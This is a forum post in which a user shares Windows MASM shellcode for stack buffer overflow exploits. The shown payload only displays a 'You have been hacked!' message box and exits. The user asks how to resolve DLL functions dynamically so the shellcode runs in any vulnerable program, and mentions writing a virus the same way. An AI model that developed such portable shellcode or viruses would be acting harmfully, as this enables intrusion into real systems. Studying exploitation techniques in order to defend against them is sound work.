Hi all,
I'm programming a shell code for stack buffer overflow vulnerabilities, I have learned about it and read alot of this vulnerability and finally I have the ability to exploit it and make the shells.
This is my code:
;+-+-+-+-+[ FileName: shellcode.asm ]+-+-+-+-+-+
.386
.model flat, stdcall
option casemap:none
;+-+-+-+-+ Include Files +-+-+-+-+-+
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
;+-+-+-+-+ Include Libraries +-+-+-+-+
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
.code
main:
;|=--------------=[ shell code section ]=---------------=|
push 0 ; OK button
jmp _caption
_rCaption:
jmp _msg
_rMsg:
push 0 ; hWnd
call DWORD PTR DS:[402034h] ; <=> call MessageBox
push 0
call DWORD PTR DS:[402014h] ; <=> call ExitProcess
;|=--------------=[ shell data section ]=---------------=|
_caption:
call _rCaption ; <=> push offset caption
caption db "ha ha",0
_msg:
call _rMsg ; <=> push offset msg
msg db "You have been hacked!",0
end main
Now as you can see the routines above (messagebox, and exitprocess) are static, so I must know the address of the procedures inside the target program and put it into the shell and assemble it again!! :(
Is there any way to make the shell dynamically, my point is how to <b>include the dll procedures inside the body of programs?</b>
The reason of my question is to make the shell works in any program that have the stack buffer overflow vulnerability and maybe to make virus do the same way.
Note: I don't accept the solution that make the shell takes the addresses from import data section of the target program, this is can work for the example above but don't work with shells that have different dll procedures.